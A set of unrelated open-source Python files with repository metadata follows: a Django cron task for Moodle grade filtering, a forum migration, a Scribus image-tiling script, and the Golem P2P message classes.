institution_type=InstituteType.objects.filter(pk__in=[int(i) if i != '' else None for i in key_array[4].split(';')])
grade=int(key_array[3])
activation_status=int(key_array[5]) if key_array[5]!= '' else None
from_date= key_array[6] if key_array[6] != 'None' else None
to_date= key_array[7] if key_array[7] != 'None' else None
if grade:
#get the moodle id for the foss
try:
fossmdl=FossMdlCourses.objects.filter(foss__in=foss)
#get moodle user grade for a specific foss quiz id having certain grade
if from_date and to_date:
user_grade=MdlQuizGrades.objects.using('moodle').values_list('userid', 'quiz', 'grade').filter(quiz__in=[f.mdlquiz_id for f in fossmdl], grade__gte=int(grade), timemodified__range=[datetime.strptime(from_date,"%Y-%m-%d").timestamp(), datetime.strptime(to_date,"%Y-%m-%d").timestamp()])
elif from_date:
user_grade=MdlQuizGrades.objects.using('moodle').values_list('userid', 'quiz', 'grade').filter(quiz__in=[f.mdlquiz_id for f in fossmdl], grade__gte=int(grade), timemodified__gte=datetime.strptime(from_date,"%Y-%m-%d").timestamp())
#convert moodle user and grades as key value pairs
dictgrade = {i[0]:{i[1]:[i[2],False]} for i in user_grade}
#get all test attendance for moodle user ids and for a specific moodle quiz ids
test_attendance=TestAttendance.objects.filter(
mdluser_id__in=list(dictgrade.keys()),
mdlquiz_id__in=[f.mdlquiz_id for f in fossmdl],
test__academic__state__in=state if state else State.objects.all(),
test__academic__city__in=city if city else City.objects.all(),
status__gte=3,
test__academic__institution_type__in=institution_type if institution_type else InstituteType.objects.all(),
test__academic__status__in=[activation_status] if activation_status else [1,3]
)
filter_ta=[]
for i in range(test_attendance.count()):
key_quiz = dictgrade.get(test_attendance[i].mdluser_id).get(test_attendance[i].mdlquiz_id)
if key_quiz:
if not key_quiz[1]:
dictgrade[test_attendance[i].mdluser_id][test_attendance[i].mdlquiz_id][1] = True
filter_ta.append(test_attendance[i])
#return the result as dict
result= {'mdl_user_grade': dictgrade, 'test_attendance': filter_ta, "count":len(filter_ta)}
caches['file_cache'].set(key,result)
if not TOPPER_WORKER_STATUS:
return result
except FossMdlCourses.DoesNotExist:
return None
return None
def async_filter_student_grades(key):
TOPPER_QUEUE.enqueue(filter_student_grades, key, job_id=key, job_timeout='72h')
|
Spoken-tutorial/spoken-website
|
cron/tasks.py
|
Python
|
gpl-3.0
| 8,023
|
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
("forum", "0003_auto_20150414_2324"),
]
operations = [
migrations.AlterField(
model_name="topic",
name="is_locked",
field=models.BooleanField(default=False, db_index=True, verbose_name=b"Est verrouill\xc3\xa9"),
preserve_default=True,
),
]
|
ChantyTaguan/zds-site
|
zds/forum/migrations/0003_auto_20151110_1145.py
|
Python
|
gpl-3.0
| 429
|
#!/usr/bin/env python
from scribus import *
import os, time, datetime, math
######################################
imagepath = "/data/projects/slitscan/malisca/tile-data/2011-12-16--chunar-banares/128"
imagepath = "/data/projects/slitscan/malisca/tile-data/2012-03-21--istanbul-straight/128"
imagepath = "/data/projects/slitscan/malisca/tile-data/2011-04-27--westautobahn-II/128x128"
imagepath = "/data/projects/slitscan/malisca/tile-data/2011-12-13--varanasi-deshaked/128"
imagepath = "/data/projects/slitscan/malisca/tile-data/2011-12-13--varanasi/128"
imagepath = "/data/projects/riverstudies/nile/tiles/2006-12-21-dv--edfu/"
imagepath = "/data/projects/slitscan/malisca/tile-data/2012-01-08--guwahati-north-deshaked/128"
imagepath = "/data/projects/slitscan/malisca/tile-data/2013-02-18--amazon-LNK"
imagepath = "/data/projects/slitscan/malisca/tile-data/2013-02-18--amazon/selection/128/"
#imagepath = "/data/projects/slitscan/malisca/tile-data/2011-12-13--varanasi-east/128"
#imagepath = "/data/projects/slitscan/malisca/tile-data/2011-06-17--linz-krems/128/"
page_size = PAPER_A6
#page_size = (209.9,297.0) #A4
#page_size = (216.2,303.3) #A4 + Lulu bleed
bleed = 6.3
orientation = LANDSCAPE # LANDSCAPE or PORTRAIT
tiles_per_row = 13
offset = 0
margin_fac = 0.2 # 0.25
linewidth=0.7
limit = 0
###################################
filetype = []
dicttype = {'j':'.jpg','p':'.png','t':'.tif','g':'.gif','P':'.pdf','J':'.jpeg'}
Dicttype = {'j':'.JPG','p':'.PNG','t':'.TIF','g':'.GIF','P':'.PDF','J':'.JPEG'}
imagetype = "jJptgP"
#valueDialog('Image Types','Enter the Image Types, where\n j=jpg,J=jpeg,p=png,t=tif,g=gif,P=pdf\n "jJptgP" selects all','jJptgP')
for t in imagetype[0:]:
filetype.append(dicttype[t])
filetype.append(Dicttype[t])
D=[]
d = os.listdir(imagepath)
d.sort()
for file in d:
for format in filetype:
if file.endswith(format):
D.append(file)
D.sort()
page_w = page_size[1]
page_h = page_size[0]
tile_w = page_w / float(tiles_per_row)
tile_h = tile_w
#tile_h = tile_w / 4
num_rows = math.floor(page_h / (tile_h + tile_h * margin_fac))
margin_h = (page_h - ( num_rows * tile_h + (num_rows-1) * tile_h * margin_fac )) / 2
progressTotal(len(D))
imagecount = offset
pagecount = 0
xpos = 0
ypos = margin_h
if not limit > 0:
limit = len(D)
if len(D) > 0:
#if newDocument(page_size, (bleed,bleed,bleed,bleed), orientation, 1, UNIT_MILLIMETERS, FACINGPAGES, FIRSTPAGERIGHT, 1):
if newDocument(page_size, (bleed,bleed,bleed,bleed), orientation, 1, UNIT_POINTS, NOFACINGPAGES, 0, 1):
while imagecount < limit:
filename,ext = os.path.splitext(D[imagecount])
if imagecount < limit:
f = createImage(xpos, ypos, tile_w, tile_h)
loadImage(imagepath + "/" + D[imagecount], f)
setScaleImageToFrame(scaletoframe=1, proportional=1, name=f)
setLineStyle(0,f)
imagecount = imagecount + 1
xpos += tile_w - 0.01
if xpos >= page_w - 0.2:
xpos = 0
ypos = ypos + tile_h + tile_h *margin_fac
# new page
if (imagecount < limit and ypos + tile_h >= page_h):
newPage(-1)
ypos = margin_h
xpos = 0
progressSet(imagecount)
#redrawAll()
#setRedraw(1)
setRedraw(1)
redrawAll()
else:
result = messageBox ('Not Found','No Images found with\n this search selection',BUTTON_OK)
|
backface/malisca
|
tools/scribus/a6-postkarten.py
|
Python
|
gpl-3.0
| 3,321
|
import abc
import collections
import logging
import time
from golem.core.databuffer import DataBuffer
from golem.core.simplehash import SimpleHash
from golem.core.simpleserializer import SimpleSerializer
logger = logging.getLogger(__name__)
class Message:
""" Communication message that is sent in all networks """
registered_message_types = {} # Message types that are allowed to be sent in the network """
def __init__(self, type_, sig="", timestamp=None):
""" Create new message. If this message type hasn't been registered yet, add this class to registered message
collection. """
if type_ not in Message.registered_message_types:
Message.registered_message_types[type_] = self.__class__
self.type = type_ # message type (class identifier)
self.sig = sig # signature (short data representation signed with private key)
if timestamp is None:
timestamp = time.time()
self.timestamp = timestamp
self.encrypted = False # inform if message was encrypted
def get_type(self):
""" Return message type
:return int: Message type
"""
return self.type
def get_short_hash(self):
""" Return short message representation for signature
:return str: short hash of serialized and sorted message dictionary representation """
sorted_dict = self._sort_obj(self.dict_repr())
return SimpleHash.hash(SimpleSerializer.dumps(sorted_dict))
def _sort_obj(self, v):
if isinstance(v, dict):
return self._sort_dict(v)
# treat objects as dictionaries
elif hasattr(v, '__dict__'):
return self._sort_dict(v.__dict__,
filter_properties=True)
# strings are iterable (see the case below)
elif isinstance(v, basestring):
return v
elif isinstance(v, collections.Iterable):
return v.__class__([self._sort_obj(_v) for _v in v])
return v
def _sort_dict(self, dictionary, filter_properties=False):
result = dict()
for k, v in dictionary.iteritems():
if filter_properties and (k.startswith('_') or callable(v)):
continue
result[k] = self._sort_obj(v)
return sorted(result.items())
def serialize(self):
""" Return serialized message
:return str: serialized message """
try:
return SimpleSerializer.dumps([self.type, self.sig, self.timestamp, self.dict_repr()])
except Exception as exc:
logger.error("Error serializing message: {}".format(exc))
raise
def serialize_to_buffer(self, db_):
"""
Append serialized message to given data buffer
:param DataBuffer db_: data buffer that message should be attached to
"""
assert isinstance(db_, DataBuffer)
db_.append_len_prefixed_string(self.serialize())
@classmethod
def decrypt_and_deserialize(cls, db_, server):
"""
Take out messages from data buffer, decrypt them using server if they are encrypted and deserialize them
:param DataBuffer db_: data buffer containing messages
:param SafeServer server: server that is able to decrypt data
:return list: list of decrypted and deserialized messages
"""
assert isinstance(db_, DataBuffer)
messages_ = []
for msg in db_.get_len_prefixed_string():
encrypted = True
try:
msg = server.decrypt(msg)
except AssertionError:
logger.warning("Failed to decrypt message, maybe it's not encrypted?")
encrypted = False
except Exception as err:
logger.error("Failed to decrypt message {}".format(str(err)))
continue
m = cls.deserialize_message(msg)
if m is None:
logger.error("Failed to deserialize message {}".format(msg))
continue
m.encrypted = encrypted
messages_.append(m)
return messages_
@classmethod
def deserialize(cls, db_):
"""
Take out messages from data buffer and deserialize them
:param DataBuffer db_: data buffer containing messages
:return list: list of deserialized messages
"""
assert isinstance(db_, DataBuffer)
messages_ = []
msg_ = db_.read_len_prefixed_string()
while msg_:
m = cls.deserialize_message(msg_)
if m:
messages_.append(m)
else:
logger.error("Failed to deserialize message {}".format(msg_))
msg_ = db_.read_len_prefixed_string()
return messages_
@classmethod
def deserialize_message(cls, msg_):
"""
Deserialize single message
:param str msg_: serialized message
:return Message|None: deserialized message or none if this message type is unknown
"""
try:
msg_repr = SimpleSerializer.loads(msg_)
except Exception as exc:
logger.error("Error deserializing message: {}".format(exc))
msg_repr = None
if isinstance(msg_repr, list) and len(msg_repr) >= 4:
msg_type = msg_repr[0]
msg_sig = msg_repr[1]
msg_timestamp = msg_repr[2]
d_repr = msg_repr[3]
if msg_type in cls.registered_message_types:
return cls.registered_message_types[msg_type](sig=msg_sig, timestamp=msg_timestamp, dict_repr=d_repr)
return None
@abc.abstractmethod
def dict_repr(self):
"""
Returns dictionary/list representation of any subclass message
"""
return
def __str__(self):
return "{}".format(self.__class__)
def __repr__(self):
return "{}".format(self.__class__)
##################
# Basic Messages #
##################
class MessageHello(Message):
Type = 0
PROTO_ID_STR = u"PROTO_ID"
CLI_VER_STR = u"CLI_VER"
PORT_STR = u"PORT"
NODE_NAME_STR = u"NODE_NAME"
CLIENT_KEY_ID_STR = u"CLIENT_KEY_ID"
RAND_VAL_STR = u"RAND_VAL"
NODE_INFO_STR = u"NODE_INFO"
SOLVE_CHALLENGE_STR = u"SOLVE_CHALLENGE"
CHALLENGE_STR = u"CHALLENGE"
DIFFICULTY_STR = u"DIFFICULTY"
METADATA_STR = u"METADATA"
def __init__(self, port=0, node_name=None, client_key_id=None, node_info=None,
rand_val=0, metadata=None, solve_challenge=False, challenge=None, difficulty=0, proto_id=0,
client_ver=0, sig="", timestamp=None, dict_repr=None):
"""
Create new introduction message
:param int port: listening port
:param str node_name: uid
:param str client_key_id: public key
:param NodeInfo node_info: information about node
:param float rand_val: random value that should be signed by other site
:param metadata dict_repr: metadata
:param boolean solve_challenge: should other client solve given challenge
:param str challenge: challenge to solve
:param int difficulty: difficulty of a challenge
:param int proto_id: protocol id
:param str client_ver: application version
:param str sig: signature
:param float timestamp: current timestamp
:param dict dict_repr: dictionary representation of a message
"""
Message.__init__(self, MessageHello.Type, sig, timestamp)
self.proto_id = proto_id
self.client_ver = client_ver
self.port = port
self.node_name = node_name
self.client_key_id = client_key_id
self.rand_val = rand_val
self.node_info = node_info
self.solve_challenge = solve_challenge
self.challenge = challenge
self.difficulty = difficulty
self.metadata = metadata
if dict_repr:
self.proto_id = dict_repr[MessageHello.PROTO_ID_STR]
self.client_ver = dict_repr[MessageHello.CLI_VER_STR]
self.port = dict_repr[MessageHello.PORT_STR]
self.node_name = dict_repr[MessageHello.NODE_NAME_STR]
self.client_key_id = dict_repr[MessageHello.CLIENT_KEY_ID_STR]
self.rand_val = dict_repr[MessageHello.RAND_VAL_STR]
self.node_info = dict_repr[MessageHello.NODE_INFO_STR]
self.challenge = dict_repr[MessageHello.CHALLENGE_STR]
self.solve_challenge = dict_repr[MessageHello.SOLVE_CHALLENGE_STR]
self.difficulty = dict_repr[MessageHello.DIFFICULTY_STR]
self.metadata = dict_repr[MessageHello.METADATA_STR]
def dict_repr(self):
return {MessageHello.PROTO_ID_STR: self.proto_id,
MessageHello.CLI_VER_STR: self.client_ver,
MessageHello.PORT_STR: self.port,
MessageHello.NODE_NAME_STR: self.node_name,
MessageHello.CLIENT_KEY_ID_STR: self.client_key_id,
MessageHello.RAND_VAL_STR: self.rand_val,
MessageHello.NODE_INFO_STR: self.node_info,
MessageHello.SOLVE_CHALLENGE_STR: self.solve_challenge,
MessageHello.CHALLENGE_STR: self.challenge,
MessageHello.DIFFICULTY_STR: self.difficulty,
MessageHello.METADATA_STR: self.metadata
}
class MessageRandVal(Message):
Type = 1
RAND_VAL_STR = u"RAND_VAL"
def __init__(self, rand_val=0, sig="", timestamp=None, dict_repr=None):
"""
Create a message with signed random value.
:param float rand_val: random value received from other side
:param str sig: signature
:param float timestamp: current timestamp
:param dict dict_repr: dictionary representation of a message
"""
Message.__init__(self, MessageRandVal.Type, sig, timestamp)
self.rand_val = rand_val
if dict_repr:
self.rand_val = dict_repr[MessageRandVal.RAND_VAL_STR]
def dict_repr(self):
return {MessageRandVal.RAND_VAL_STR: self.rand_val}
class MessageDisconnect(Message):
Type = 2
DISCONNECT_REASON_STR = u"DISCONNECT_REASON"
def __init__(self, reason=-1, sig="", timestamp=None, dict_repr=None):
"""
Create a disconnect message
:param int reason: disconnection reason
:param str sig: signature
:param float timestamp: current timestamp
:param dict dict_repr: dictionary representation of a message
"""
Message.__init__(self, MessageDisconnect.Type, sig, timestamp)
self.reason = reason
if dict_repr:
self.reason = dict_repr[MessageDisconnect.DISCONNECT_REASON_STR]
def dict_repr(self):
return {MessageDisconnect.DISCONNECT_REASON_STR: self.reason}
class MessageChallengeSolution(Message):
Type = 3
SOLUTION_STR = u"SOLUTION"
def __init__(self, solution="", sig="", timestamp=None, dict_repr=None):
"""
Create a message with signed cryptographic challenge solution
:param str solution: challenge solution
:param str sig: signature
:param float timestamp: current timestamp
:param dict dict_repr: dictionary representation of a message
"""
Message.__init__(self, MessageChallengeSolution.Type, sig, timestamp)
self.solution = solution
if dict_repr:
self.solution = dict_repr[MessageChallengeSolution.SOLUTION_STR]
def dict_repr(self):
return {MessageChallengeSolution.SOLUTION_STR: self.solution}
################
# P2P Messages #
################
P2P_MESSAGE_BASE = 1000
class MessagePing(Message):
Type = P2P_MESSAGE_BASE + 1
PING_STR = u"PING"
def __init__(self, sig="", timestamp=None, dict_repr=None):
"""
Create ping message
:param str sig: signature
:param float timestamp: current timestamp
:param dict dict_repr: dictionary representation of a message
"""
Message.__init__(self, MessagePing.Type, sig, timestamp)
if dict_repr:
assert dict_repr.get(MessagePing.PING_STR)
def dict_repr(self):
return {MessagePing.PING_STR: True}
class MessagePong(Message):
Type = P2P_MESSAGE_BASE + 2
PONG_STR = u"PONG"
def __init__(self, sig="", timestamp=None, dict_repr=None):
"""
Create pong message
:param str sig: signature
:param float timestamp: current timestamp
:param dict dict_repr: dictionary representation of a message
"""
Message.__init__(self, MessagePong.Type, sig, timestamp)
if dict_repr:
assert dict_repr.get(MessagePong.PONG_STR)
def dict_repr(self):
return {MessagePong.PONG_STR: True}
class MessageGetPeers(Message):
Type = P2P_MESSAGE_BASE + 3
GET_PEERS_STR = u"GET_PEERS"
def __init__(self, sig="", timestamp=None, dict_repr=None):
"""
Create request peers message
:param str sig: signature
:param float timestamp: current timestamp
:param dict dict_repr: dictionary representation of a message
"""
Message.__init__(self, MessageGetPeers.Type, sig, timestamp)
if dict_repr:
assert dict_repr.get(MessageGetPeers.GET_PEERS_STR)
def dict_repr(self):
return {MessageGetPeers.GET_PEERS_STR: True}
class MessagePeers(Message):
Type = P2P_MESSAGE_BASE + 4
PEERS_STR = u"PEERS"
def __init__(self, peers_array=None, sig="", timestamp=None, dict_repr=None):
"""
Create message containing information about peers
:param list peers_array: list of peers information
:param str sig: signature
:param float timestamp: current timestamp
:param dict dict_repr: dictionary representation of a message
"""
Message.__init__(self, MessagePeers.Type, sig, timestamp)
if peers_array is None:
peers_array = []
self.peers_array = peers_array
if dict_repr:
self.peers_array = dict_repr[MessagePeers.PEERS_STR]
def dict_repr(self):
return {MessagePeers.PEERS_STR: self.peers_array}
def get_short_hash(self):
return SimpleHash.hash(SimpleSerializer.dumps(self._sort_obj(self.peers_array)))
class MessageGetTasks(Message):
Type = P2P_MESSAGE_BASE + 5
GET_TASKS_STR = u"GET_TASKS"
def __init__(self, sig="", timestamp=None, dict_repr=None):
""" Create request task message
:param str sig: signature
:param float timestamp: current timestamp
:param dict dict_repr: dictionary representation of a message
"""
Message.__init__(self, MessageGetTasks.Type, sig, timestamp)
if dict_repr:
assert dict_repr.get(MessageGetTasks.GET_TASKS_STR)
def dict_repr(self):
return {MessageGetTasks.GET_TASKS_STR: True}
class MessageTasks(Message):
Type = P2P_MESSAGE_BASE + 6
TASKS_STR = u"TASKS"
def __init__(self, tasks_array=None, sig="", timestamp=None, dict_repr=None):
"""
Create message containing information about tasks
:param list tasks_array: list of peers information
:param str sig: signature
:param float timestamp: current timestamp
:param dict dict_repr: dictionary representation of a message
"""
Message.__init__(self, MessageTasks.Type, sig, timestamp)
if tasks_array is None:
tasks_array = []
self.tasks_array = tasks_array
if dict_repr:
self.tasks_array = dict_repr[MessageTasks.TASKS_STR]
def dict_repr(self):
return {MessageTasks.TASKS_STR: self.tasks_array}
def get_short_hash(self):
return SimpleHash.hash(SimpleSerializer.dumps(self._sort_obj(self.tasks_array)))
class MessageRemoveTask(Message):
Type = P2P_MESSAGE_BASE + 7
REMOVE_TASK_STR = u"REMOVE_TASK"
def __init__(self, task_id=None, sig="", timestamp=None, dict_repr=None):
"""
Create message with request to remove given task
:param str task_id: task to be removed
:param str sig: signature
:param float timestamp: current timestamp
:param dict dict_repr: dictionary representation of a message
"""
Message.__init__(self, MessageRemoveTask.Type, sig, timestamp)
self.task_id = task_id
if dict_repr:
self.task_id = dict_repr[MessageRemoveTask.REMOVE_TASK_STR]
def dict_repr(self):
return {MessageRemoveTask.REMOVE_TASK_STR: self.task_id}
class MessageGetResourcePeers(Message):
Type = P2P_MESSAGE_BASE + 8
WANT_RESOURCE_PEERS_STR = u"WANT_RESOURCE_PEERS"
def __init__(self, sig="", timestamp=None, dict_repr=None):
"""
Create request for resource peers
:param str sig: signature
:param float timestamp: current timestamp
:param dict dict_repr: dictionary representation of a message
"""
Message.__init__(self, MessageGetResourcePeers.Type, sig, timestamp)
if dict_repr:
assert dict_repr.get(MessageGetResourcePeers.WANT_RESOURCE_PEERS_STR)
def dict_repr(self):
return {MessageGetResourcePeers.WANT_RESOURCE_PEERS_STR: True}
class MessageResourcePeers(Message):
Type = P2P_MESSAGE_BASE + 9
RESOURCE_PEERS_STR = u"RESOURCE_PEERS"
def __init__(self, resource_peers=None, sig="", timestamp=None, dict_repr=None):
"""
Create message containing information about resource peers
:param list resource_peers: list of peers information
:param str sig: signature
:param float timestamp: current timestamp
:param dict dict_repr: dictionary representation of a message
"""
Message.__init__(self, MessageResourcePeers.Type, sig, timestamp)
if resource_peers is None:
resource_peers = []
self.resource_peers = resource_peers
if dict_repr:
self.resource_peers = dict_repr[MessageResourcePeers.RESOURCE_PEERS_STR]
def dict_repr(self):
return {MessageResourcePeers.RESOURCE_PEERS_STR: self.resource_peers}
def get_short_hash(self):
return SimpleHash.hash(SimpleSerializer.dumps(self._sort_obj(self.resource_peers)))
class MessageDegree(Message):
Type = P2P_MESSAGE_BASE + 10
DEGREE_STR = u"DEGREE"
def __init__(self, degree=None, sig="", timestamp=None, dict_repr=None):
"""
Create message with information about node degree
:param int degree: node degree in golem network
:param str sig: signature
:param float timestamp: current timestamp
:param dict dict_repr: dictionary representation of a message
"""
Message.__init__(self, MessageDegree.Type, sig, timestamp)
self.degree = degree
if dict_repr:
self.degree = dict_repr[MessageDegree.DEGREE_STR]
def dict_repr(self):
return {MessageDegree.DEGREE_STR: self.degree}
class MessageGossip(Message):
Type = P2P_MESSAGE_BASE + 11
GOSSIP_STR = u"GOSSIP"
def __init__(self, gossip=None, sig="", timestamp=None, dict_repr=None):
"""
Create gossip message
:param list gossip: gossip to be send
:param str sig: signature
:param float timestamp: current timestamp
:param dict dict_repr: dictionary representation of a message
"""
Message.__init__(self, MessageGossip.Type, sig, timestamp)
self.gossip = gossip
if dict_repr:
self.gossip = dict_repr[MessageGossip.GOSSIP_STR]
def dict_repr(self):
return {MessageGossip.GOSSIP_STR: self.gossip}
class MessageStopGossip(Message):
Type = P2P_MESSAGE_BASE + 12
STOP_GOSSIP_STR = u"STOP_GOSSIP"
def __init__(self, sig="", timestamp=None, dict_repr=None):
""" Create stop gossip message
:param str sig: signature
:param float timestamp: current timestamp
:param dict dict_repr: dictionary representation of a message
"""
Message.__init__(self, MessageStopGossip.Type, sig, timestamp)
if dict_repr:
assert dict_repr.get(MessageStopGossip.STOP_GOSSIP_STR)
def dict_repr(self):
return {MessageStopGossip.STOP_GOSSIP_STR: True}
class MessageLocRank(Message):
Type = P2P_MESSAGE_BASE + 13
NODE_ID_STR = u"NODE_ID"
LOC_RANK_STR = u"LOC_RANK"
def __init__(self, node_id='', loc_rank='', sig="", timestamp=None, dict_repr=None):
"""
Create message with local opinion about given node
:param uuid node_id: message contain opinion about node with this id
:param LocalRank loc_rank: opinion about node
:param str sig: signature
:param float timestamp: current timestamp
:param dict dict_repr: dictionary representation of a message
"""
Message.__init__(self, MessageLocRank.Type, sig, timestamp)
self.node_id = node_id
self.loc_rank = loc_rank
if dict_repr:
self.node_id = dict_repr[MessageLocRank.NODE_ID_STR]
self.loc_rank = dict_repr[MessageLocRank.LOC_RANK_STR]
def dict_repr(self):
return {MessageLocRank.NODE_ID_STR: self.node_id,
MessageLocRank.LOC_RANK_STR: self.loc_rank}
class MessageFindNode(Message):
Type = P2P_MESSAGE_BASE + 14
NODE_KEY_ID_STR = u"NODE_KEY_ID"
def __init__(self, node_key_id='', sig="", timestamp=None, dict_repr=None):
"""
Create find node message
:param str node_key_id: key of a node to be find
:param str sig: signature
:param float timestamp: current timestamp
:param dict dict_repr: dictionary representation of a message
"""
Message.__init__(self, MessageFindNode.Type, sig, timestamp)
self.node_key_id = node_key_id
if dict_repr:
self.node_key_id = dict_repr[MessageFindNode.NODE_KEY_ID_STR]
def dict_repr(self):
return {MessageFindNode.NODE_KEY_ID_STR: self.node_key_id}
class MessageWantToStartTaskSession(Message):
Type = P2P_MESSAGE_BASE + 15
NODE_INFO_STR = u"NODE_INFO"
CONN_ID_STR = u"CONN_ID"
SUPER_NODE_INFO_STR = u"SUPER_NODE_INFO"
def __init__(self, node_info=None, conn_id=None, super_node_info=None, sig="", timestamp=None,
dict_repr=None):
"""
Create request for starting task session with given node
:param Node node_info: information about this node
:param uuid conn_id: connection id for reference
:param Node|None super_node_info: information about known supernode
:param str sig: signature
:param float timestamp: current timestamp
:param dict dict_repr: dictionary representation of a message
"""
Message.__init__(self, MessageWantToStartTaskSession.Type, sig, timestamp)
self.node_info = node_info
self.conn_id = conn_id
self.super_node_info = super_node_info
if dict_repr:
self.node_info = dict_repr[MessageWantToStartTaskSession.NODE_INFO_STR]
self.conn_id = dict_repr[MessageWantToStartTaskSession.CONN_ID_STR]
self.super_node_info = dict_repr[MessageWantToStartTaskSession.SUPER_NODE_INFO_STR]
def dict_repr(self):
return {
MessageWantToStartTaskSession.NODE_INFO_STR: self.node_info,
MessageWantToStartTaskSession.CONN_ID_STR: self.conn_id,
MessageWantToStartTaskSession.SUPER_NODE_INFO_STR: self.super_node_info
}
class MessageSetTaskSession(Message):
Type = P2P_MESSAGE_BASE + 16
KEY_ID_STR = u"KEY_ID"
NODE_INFO_STR = u"NODE_INFO"
CONN_ID_STR = u"CONN_ID"
SUPER_NODE_INFO_STR = u"SUPER_NODE_INFO"
def __init__(self, key_id=None, node_info=None, conn_id=None, super_node_info=None, sig="", timestamp=None,
dict_repr=None):
"""
Create message with information that node from node_info want to start task session with key_id node
:param key_id: target node key
:param Node node_info: information about requestor
:param uuid conn_id: connection id for reference
:param Node|None super_node_info: information about known supernode
:param str sig: signature
:param float timestamp: current timestamp
:param dict dict_repr: dictionary representation of a message
"""
Message.__init__(self, MessageSetTaskSession.Type, sig, timestamp)
self.key_id = key_id
self.node_info = node_info
self.conn_id = conn_id
self.super_node_info = super_node_info
if dict_repr:
self.key_id = dict_repr[MessageSetTaskSession.KEY_ID_STR]
self.node_info = dict_repr[MessageSetTaskSession.NODE_INFO_STR]
self.conn_id = dict_repr[MessageSetTaskSession.CONN_ID_STR]
self.super_node_info = dict_repr[MessageSetTaskSession.SUPER_NODE_INFO_STR]
def dict_repr(self):
return {
MessageSetTaskSession.KEY_ID_STR: self.key_id,
MessageSetTaskSession.NODE_INFO_STR: self.node_info,
MessageSetTaskSession.CONN_ID_STR: self.conn_id,
MessageSetTaskSession.SUPER_NODE_INFO_STR: self.super_node_info
}
class MessageNatHole(Message):
Type = P2P_MESSAGE_BASE + 17
KEY_ID_STR = u"KEY_ID"
ADDR_STR = u"ADDR"
PORT_STR = u"PORT"
CONN_ID_STR = u"CONN_ID"
def __init__(self, key_id=None, addr=None, port=None, conn_id=None, sig="", timestamp=None,
dict_repr=None):
"""
Create message with information about nat hole
:param key_id: key of the node behind nat hole
:param str addr: address of the nat hole
:param int port: port of the nat hole
:param uuid conn_id: connection id for reference
:param str sig: signature
:param float timestamp: current timestamp
:param dict dict_repr: dictionary representation of a message
"""
Message.__init__(self, MessageNatHole.Type, sig, timestamp)
self.key_id = key_id
self.addr = addr
self.port = port
self.conn_id = conn_id
if dict_repr:
self.key_id = dict_repr[MessageNatHole.KEY_ID_STR]
self.addr = dict_repr[MessageNatHole.ADDR_STR]
self.port = dict_repr[MessageNatHole.PORT_STR]
self.conn_id = dict_repr[MessageNatHole.CONN_ID_STR]
def dict_repr(self):
return {
MessageNatHole.KEY_ID_STR: self.key_id,
MessageNatHole.ADDR_STR: self.addr,
MessageNatHole.PORT_STR: self.port,
MessageNatHole.CONN_ID_STR: self.conn_id
}
class MessageNatTraverseFailure(Message):
Type = P2P_MESSAGE_BASE + 18
CONN_ID_STR = u"CONN_ID"
def __init__(self, conn_id=None, sig="", timestamp=None, dict_repr=None):
"""
Create message with information about unsuccessful nat traverse
:param uuid conn_id: connection id for reference
:param str sig: signature
:param float timestamp: current timestamp
:param dict dict_repr: dictionary representation of a message
"""
Message.__init__(self, MessageNatTraverseFailure.Type, sig, timestamp)
self.conn_id = conn_id
if dict_repr:
self.conn_id = dict_repr[MessageNatTraverseFailure.CONN_ID_STR]
def dict_repr(self):
return {
MessageNatTraverseFailure.CONN_ID_STR: self.conn_id
}
class MessageInformAboutNatTraverseFailure(Message):
Type = P2P_MESSAGE_BASE + 19
KEY_ID_STR = u"KEY_ID"
CONN_ID_STR = u"CONN_ID"
def __init__(self, key_id=None, conn_id=None, sig="", timestamp=None, dict_repr=None):
"""
Create request to inform node with key_id about unsuccessful nat traverse.
:param key_id: key of the node that should be inform about failure
:param uuid conn_id: connection id for reference
:param str sig: signature
:param float timestamp: current timestamp
:param dict dict_repr: dictionary representation of a message
"""
Message.__init__(self, MessageInformAboutNatTraverseFailure.Type, sig, timestamp)
self.key_id = key_id
self.conn_id = conn_id
if dict_repr:
self.key_id = dict_repr[MessageInformAboutNatTraverseFailure.KEY_ID_STR]
self.conn_id = dict_repr[MessageInformAboutNatTraverseFailure.CONN_ID_STR]
def dict_repr(self):
return {
MessageInformAboutNatTraverseFailure.KEY_ID_STR: self.key_id,
MessageInformAboutNatTraverseFailure.CONN_ID_STR: self.conn_id
}
TASK_MSG_BASE = 2000
class MessageWantToComputeTask(Message):
Type = TASK_MSG_BASE + 1
NODE_NAME_STR = u"NODE_NAME"
TASK_ID_STR = u"TASK_ID"
PERF_INDEX_STR = u"PERF_INDEX"
MAX_RES_STR = u"MAX_RES"
MAX_MEM_STR = u"MAX_MEM"
NUM_CORES_STR = u"NUM_CORES"
PRICE_STR = u"PRICE"
def __init__(self, node_name=0, task_id=0, perf_index=0, price=0, max_resource_size=0, max_memory_size=0,
num_cores=0, sig="", timestamp=None, dict_repr=None):
"""
Create message with information that node wants to compute given task
:param str node_name: id of that node
:param uuid task_id: if of a task that node wants to compute
:param float perf_index: benchmark result for this task type
:param int max_resource_size: how much disk space can this node offer
:param int max_memory_size: how much ram can this node offer
:param int num_cores: how many cpu cores this node can offer
:param str sig: signature
:param float timestamp: current timestamp
:param dict dict_repr: dictionary representation of a message
"""
Message.__init__(self, MessageWantToComputeTask.Type, sig, timestamp)
self.node_name = node_name
self.task_id = task_id
self.perf_index = perf_index
self.max_resource_size = max_resource_size
self.max_memory_size = max_memory_size
self.num_cores = num_cores
self.price = price
if dict_repr:
self.node_name = dict_repr[MessageWantToComputeTask.NODE_NAME_STR]
self.task_id = dict_repr[MessageWantToComputeTask.TASK_ID_STR]
self.perf_index = dict_repr[MessageWantToComputeTask.PERF_INDEX_STR]
self.max_resource_size = dict_repr[MessageWantToComputeTask.MAX_RES_STR]
self.max_memory_size = dict_repr[MessageWantToComputeTask.MAX_MEM_STR]
self.num_cores = dict_repr[MessageWantToComputeTask.NUM_CORES_STR]
self.price = dict_repr[MessageWantToComputeTask.PRICE_STR]
def dict_repr(self):
return {MessageWantToComputeTask.NODE_NAME_STR: self.node_name,
MessageWantToComputeTask.TASK_ID_STR: self.task_id,
MessageWantToComputeTask.PERF_INDEX_STR: self.perf_index,
MessageWantToComputeTask.MAX_RES_STR: self.max_resource_size,
MessageWantToComputeTask.MAX_MEM_STR: self.max_memory_size,
MessageWantToComputeTask.NUM_CORES_STR: self.num_cores,
MessageWantToComputeTask.PRICE_STR: self.price}
class MessageTaskToCompute(Message):
Type = TASK_MSG_BASE + 2
COMPUTE_TASK_DEF_STR = u"COMPUTE_TASK_DEF"
